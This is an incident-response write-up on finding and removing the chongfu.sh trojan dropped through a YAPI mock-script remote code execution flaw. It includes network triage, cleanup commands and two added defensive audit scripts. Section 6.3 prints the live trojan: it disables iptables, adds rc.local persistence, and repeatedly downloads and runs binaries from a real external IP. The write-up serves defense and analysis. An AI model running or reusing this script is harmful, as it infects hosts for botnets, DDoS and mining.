Handling the chongfu.sh trojan dropped through a Yapi vulnerability
2022-07-28 06:47:00 【opreator.ke】
1.【Background】 The server's network was sluggish and the host kept sending large volumes of traffic outward, eventually saturating the network.
2.【Triage】
2.1 Logged in to the affected server; top showed no abnormal CPU or memory usage.
2.2 Checked the network connection states:
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
Nothing abnormal: the TCP connections were all in normal states.
2.3 Packet capture and analysis with tcpdump
tcpdump -i enp3s0
14:53:48.496584 IP smtp-5.etopbags.info.dnp > 218.46046: Flags [R.], seq 0, ack 3002381902, win 0, length 0
14:53:48.496825 IP 218.46048 > smtp-5.etopbags.info.dnp: Flags [S], seq 361520383, win 29200, options [mss 1460,sackOK,TS val 2043795 ecr 0,nop,wscale 7], length 0
14:53:48.536622 IP smtp-5.etopbags.info.dnp > 218.46048: Flags [R.], seq 0, ack 361520384, win 0, length 0
14:53:48.536876 IP 218.46050 > smtp-5.etopbags.info.dnp: Flags [S], seq 914055455, win 29200, options [mss 1460,sackOK,TS val 2043836 ecr 0,nop,wscale 7], length 0
14:53:48.574447 IP smtp-5.etopbags.info.dnp > 218.46050: Flags [R.], seq 0, ack 914055456, win 0, length 0
14:53:48.574644 IP 218.46052 > smtp-5.etopbags.info.dnp: Flags [S], seq 908877290, win 29200, options [mss 1460,sackOK,TS val 2043873 ecr 0,nop,wscale 7], length 0
14:53:48.609252 IP smtp-5.etopbags.info.dnp > 218.46052: Flags [R.], seq 0, ack 908877291, win 0, length 0
14:53:48.609342 IP 218.46054 > smtp-5.etopbags.info.dnp: Flags [S], seq 3724761583, win 29200, options [mss 1460,sackOK,TS val 2043908 ecr 0,nop,wscale 7], length 0
14:53:48.646988 IP smtp-5.etopbags.info.dnp > 218.46054: Flags [R.], seq 0, ack 3724761584, win 0, length 0
14:53:48.647066 IP 218.46056 > smtp-5.etopbags.info.dnp: Flags [S], seq 1209043513, win 29200, options [mss 1460,sackOK,TS val 2043946 ecr 0,nop,wscale 7], length 0
14:53:48.681432 IP smtp-5.etopbags.info.dnp > 218.46056: Flags [R.], seq 0, ack 1209043514, win 0, length 0
14:53:48.681516 IP 218.46058 > smtp-5.etopbags.info.dnp: Flags [S], seq 1382946052, win 29200, options [mss 1460,sackOK,TS val 2043980 ecr 0,nop,wscale 7], length 0
14:53:48.722538 IP smtp-5.etopbags.info.dnp > 218.46058: Flags [R.], seq 0, ack 1382946053, win 0, length 0
14:53:48.722614 IP 218.46060 > smtp-5.etopbags.info.dnp: Flags [S], seq 572251828, win 29200, options [mss 1460,sackOK,TS val 2044021 ecr 0,nop,wscale 7], length 0
14:53:48.759004 IP smtp-5.etopbags.info.dnp > 218.46060: Flags [R.], seq 0, ack 572251829, win 0, length 0
14:53:48.759089 IP 218.46064 > smtp-5.etopbags.info.dnp: Flags [S], seq 3797818250, win 29200, options [mss 1460,sackOK,TS val 2044058 ecr 0,nop,wscale 7], length 0
Anomaly found: the host keeps sending packets to the external host smtp-5.etopbags.info.dnp (dnp is tcpdump's service name for port 20000).
2.4 The capture tool showed that target port 20000 was continuously receiving packets.
2.5 netstat -lan | grep 20000
Checked which process owned this listening port: it was a yapi program.
The process was running from /root/my-yapi/20000.
Entering that directory, abnormal files were found.
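The triage in 2.3 and 2.4 came down to reading the capture by eye. As an added example (not the author's code), the script below summarizes tcpdump text output per destination so a host that keeps sending SYNs and getting RSTs back, from ever-changing source ports, stands out. The sample capture is constructed with RFC 5737 documentation addresses and is not the page's capture; the interface name and the threshold of 5 SYNs are assumptions.

```shell
#!/bin/sh
# Added example (not the page's code): summarize the "SYN out, RST back" pattern from
# tcpdump text output so one noisy destination stands out. Input is the default
# human-readable tcpdump line; with -n the hosts appear as IP.port, as in the sample.
# The sample capture is constructed (RFC 5737 addresses), not the page's capture.
sample_capture() {
    cat <<'EOF'
14:53:48.496825 IP 192.0.2.10.46048 > 198.51.100.7.20000: Flags [S], seq 361520383, win 29200, options [mss 1460,sackOK,TS val 2043795 ecr 0,nop,wscale 7], length 0
14:53:48.536622 IP 198.51.100.7.20000 > 192.0.2.10.46048: Flags [R.], seq 0, ack 361520384, win 0, length 0
14:53:48.536876 IP 192.0.2.10.46050 > 198.51.100.7.20000: Flags [S], seq 914055455, win 29200, options [mss 1460,sackOK,TS val 2043836 ecr 0,nop,wscale 7], length 0
14:53:48.574447 IP 198.51.100.7.20000 > 192.0.2.10.46050: Flags [R.], seq 0, ack 914055456, win 0, length 0
14:53:48.574644 IP 192.0.2.10.46052 > 198.51.100.7.20000: Flags [S], seq 908877290, win 29200, options [mss 1460,sackOK,TS val 2043873 ecr 0,nop,wscale 7], length 0
14:53:48.609252 IP 198.51.100.7.20000 > 192.0.2.10.46052: Flags [R.], seq 0, ack 908877291, win 0, length 0
14:53:49.001200 IP 192.0.2.10.51234 > 203.0.113.5.443: Flags [S], seq 1, win 29200, options [mss 1460,sackOK], length 0
14:53:49.041900 IP 203.0.113.5.443 > 192.0.2.10.51234: Flags [S.], seq 0, ack 2, win 65535, options [mss 1460], length 0
14:53:49.042300 IP 192.0.2.10.51234 > 203.0.113.5.443: Flags [P.], seq 1:100, ack 1, win 229, length 99
EOF
}

# Per destination (host.port): SYNs sent to it, RSTs it sent back, distinct local
# source sockets used. Fields of a tcpdump TCP line, space-separated:
#   $1 time  $2 "IP"/"IP6"  $3 src  $4 ">"  $5 "dst:"  $6 "Flags"  $7 "[S],"
# Output, sorted by SYN count: "<syn> <rst> <distinct_src> <dst>".
tcpdump_syn_summary() {
    awk '
        ($2 == "IP" || $2 == "IP6") && $6 == "Flags" {
            dst = $5; sub(/:$/, "", dst)
            # "[S]," -> "S", "[R.]," -> "R.": drop the brackets and trailing comma
            flags = substr($7, 2, length($7) - 3)
            if (flags == "S") {
                syn[dst]++
                if (!(($3, dst) in seen)) { seen[$3, dst] = 1; nsrc[dst]++ }
            } else if (flags == "R.") {
                rst[$3]++          # the RST comes from the remote side, so key by source
            }
        }
        END {
            for (d in syn) printf "%d %d %d %s\n", syn[d], rst[d] + 0, nsrc[d], d
        }' | sort -rn
}

# Print destinations with at least MIN SYNs where at least half were answered with RST:
# a client hammering a closed or dead remote port from changing source ports is how
# the infected host in this write-up looked. MIN is an assumed threshold; tune it.
suspicious_destinations() {
    min=${1:-5}
    awk -v min="$min" '$1 >= min && $2 * 2 >= $1 { print $4 }'
}

# Live usage (interface name assumed): tcpdump -nn -i enp3s0 tcp | tcpdump_syn_summary
sample_capture | tcpdump_syn_summary
echo "--- suspicious (>= 3 SYNs, mostly refused):"
sample_capture | tcpdump_syn_summary | suspicious_destinations 3
```

On the constructed sample the summary shows three SYNs to 198.51.100.7.20000, all three answered with RST from three different source ports, while the single completed handshake to 203.0.113.5.443 drops out of the suspicious list.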
3.【Trojan cleanup】
Cleanup followed this document:
https://zhuanlan.zhihu.com/p/90792899
3.1 Kill the process: ps aux | grep "20000" | grep -v grep | awk '{print $2}' | xargs kill -9
3.2 Remove the autostart entry: vim /etc/rc.local and delete the line sh /etc/chongfu.sh &
3.3 Remove the scripts: rm -rf /etc/chongfu.sh /tem/chongfu.sh
3.4 Change the login password: passwd
3.5 Reboot: reboot
Good heavens: on follow-up, this trojan turned out to be particularly stubborn.
It disguised itself under several system file names and was tied to several scheduled scripts that kept re-creating it. Only after a complete cleanup was it dealt with.
4.【Locating the vulnerability】
4.1 Why were trojan files generated in the yapi directory?
4.2 This is an intranet server, and its passwords and ports are covered by security policy.
4.3 Started locating the problem: logging in to the yapi administrator account revealed a large number of abnormal registered users.
I went straight to GitHub to look, and then found:
http://www.hackdig.com/07/hack-404188.htm
Because there is no patch for the YAPI remote code execution 0day, the BillGates and Mirai botnet Trojan families mainly use the controlled hosts to launch DDoS attacks, leave backdoors, or carry out mining. Tencent security experts suggest that government and enterprise organizations using the YAPI interface management platform take the following measures as soon as possible to mitigate the risk:
1. Deploy Tencent Cloud Firewall to intercept threats in real time;
2. Close the YAPI user registration function to stop attackers from registering;
3. Delete maliciously registered users to prevent attackers from adding mock scripts again;
4. Delete malicious mock scripts to prevent them from being triggered by access again;
5. Roll the server back to a snapshot to clear the backdoor implanted through the exploit.
5.【yapi problem fix】
5.1 First, remove the public Internet address.
5.2 Following the advice on GitHub, user registration was disabled.
6.【Trojan retrospective】
6.1 The attacker first uses the open registration function to create an account; a custom mock script can only be defined after logging in.
6.2 Malicious commands are embedded in the mock script and are executed when a user's request to the mock interface triggers it.
That is how the scene above came about.
6.3 Trojan script:
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# qun:10776622
# 2016-06-14
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
echo "chmod +x /tmp/X64" >> /etc/rc.local
echo "/tmp/X64 SHX64" >> /etc/rc.local
echo "chmod +x /tmp/ShouHu" >> /etc/rc.local
echo "/tmp/ShouHu SHX64" >> /etc/rc.local
m=X64 SHX64
script=ShouHu SHX64
hfs_m=http://27.50.49.61:2131/X64
hfs_s=http://27.50.49.61:2131/ShouHu
rm -f /tmp/$m*
while true
do
ps aux | grep $m | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$m
if [ $? -eq 0 ];then
/tmp/$m
else
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
fi
fi
ps aux | grep $script | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$script
if [ $? -eq 0 ];then
/tmp/$script
else
cd /tmp;wget $hfs_s ; chmod a+x $script;/tmp/$script
fi
fi
done
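The cleanup steps in section 3 and the script above show where this trojan anchored itself: lines appended to /etc/rc.local that chmod and launch binaries from /tmp, a backgrounded /etc/chongfu.sh, scheduled scripts that re-created it, and a download loop pulling from a fixed host. As an added example (not the author's or the project's code), the audit below checks those persistence points. Every path takes an optional root prefix so it can run against a mounted disk image or a copied /etc as well as the live host; the indicator patterns are taken from this page, the generic patterns are heuristics, and the port 20000 default is this incident's.

```shell
#!/bin/sh
# Added example (not the page's code): audit the persistence points this trojan used.
# Paths take an optional root prefix so the checks can run against a mounted disk
# image or copied /etc as well as the live host (default prefix "" = live host).

# Indicators taken from the page: the startup script, the /tmp binaries it re-downloads,
# and the download host in chongfu.sh.
IOC_RE='chongfu\.sh|/tmp/X64|/tmp/ShouHu|27\.50\.49\.61'
# Generic heuristics: executing or chmod'ing things in world-writable dirs, fetching with
# wget/curl, or backgrounding a command from a boot script. Review hits by hand.
GENERIC_RE='/tmp/|/dev/shm/|/var/tmp/|wget |curl |chmod +a?[+]x|&[[:space:]]*$'

# Report rc.local lines matching either pattern (exit 0 = hits found, 1 = clean/missing).
audit_rc_local() {
    rc=${1:-/etc/rc.local}
    [ -r "$rc" ] || return 1
    grep -nE "$IOC_RE|$GENERIC_RE" "$rc"
}

# Same check over every file in a cron directory (system crontabs and per-user spools).
audit_cron_dir() {
    dir=${1:-/etc/cron.d}
    [ -d "$dir" ] || return 1
    grep -rnE "$IOC_RE|$GENERIC_RE" "$dir"
}

# Executable regular files sitting directly in a temp directory: legitimate software
# rarely keeps binaries there, and this trojan lived in /tmp/X64 and /tmp/ShouHu.
audit_tmp_executables() {
    dir=${1:-/tmp}
    [ -d "$dir" ] || return 1
    find "$dir" -maxdepth 1 -type f -perm -100
}

# Which process owns the suspicious port (live host only); ss preferred, netstat fallback.
# Sharper than the page's ps | grep "20000", which also matches unrelated PIDs and args.
listener_for_port() {
    port=${1:-20000}
    if command -v ss >/dev/null 2>&1; then
        ss -ltnp "sport = :$port"
    elif command -v netstat >/dev/null 2>&1; then
        netstat -ltnp 2>/dev/null | grep ":$port "
    fi
}

run_audit() {
    root=${1:-}
    echo "== rc.local"; audit_rc_local "$root/etc/rc.local"
    for d in /etc/cron.d /var/spool/cron /var/spool/cron/crontabs; do
        echo "== cron: $d"; audit_cron_dir "$root$d"
    done
    for d in /tmp /var/tmp /dev/shm; do
        echo "== executables in $d"; audit_tmp_executables "$root$d"
    done
    [ -z "$root" ] && { echo "== listener on port 20000"; listener_for_port 20000; }
    return 0
}

# Live host: ./audit.sh      Mounted image: ./audit.sh /mnt/image
run_audit "$@"
```

Run it before and after the cleanup in section 3: a clean rc.local returns non-zero from audit_rc_local, so a re-run that turns up hits again is the quickest sign that one of the "multiple timed repeating scripts" the author mentions is still alive.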